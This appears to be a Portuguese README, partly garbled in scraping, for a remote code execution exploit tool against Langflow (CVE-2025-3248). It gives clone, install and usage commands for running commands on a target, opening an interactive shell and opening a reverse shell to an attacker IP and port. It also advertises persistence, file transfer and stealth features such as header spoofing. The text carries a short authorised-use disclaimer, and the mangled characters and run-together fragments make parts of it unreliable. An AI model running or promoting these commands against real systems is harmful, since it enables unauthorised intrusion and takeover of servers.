
Exploit de Execução Remota de Código para Langflow (CVE-2025-3248) - [ By S4Tech ]
Exploração de Execução Remota de Código para Langflow (CVE-2025-3248)
persist)upload caminho_local caminho_remotodownload caminho_remoto caminho_localclear para terminalUser-Agent aleatórioX-Forwarded-Forexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [opções]
python exploit.py http://alvo.com
python exploit.py http://alvo.com --shell
python exploit.py http://alvo.com --command "whoami"
python exploit.py http://alvo.com --reverse 192.168.1.100 4444
Image.png)
âڑ ï¸ڈ Esta ferramenta é apenas para fins educacionais e testes autorizados.
âڑ ï¸ڈ O uso não autorizado contra sistemas que você não possui ou não tem permissão para testar é ilegal.
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para mais detalhes.
Pull requests são bem-vindos. Para mudanças significativas, por favor abra uma issue primeiro para discutir o que você gostaria de alterar.
| Recurso | v1.0 | v2.0 |
|---|
| Métodos de Payload | 1 | 5 |
| Transferência de Arquivos | ❌ Não suportado | ✅ Suportado |
| Persistência | ❌ | ✅ |
| Nível de Furtividade | Básico | Avançado |
| Registro de Sessão | ❌ | ✅ |
| Opção | Descrição |
|---|
--shell | Iniciar shell interativo |
--reverse IP PORTA | Iniciar reverse shell para IP:PORTA |
--command CMD | Executar comando único |
--verbose | Ativar saída verbose |
--timeout SEG | Definir timeout da requisição (padrão: 10s) |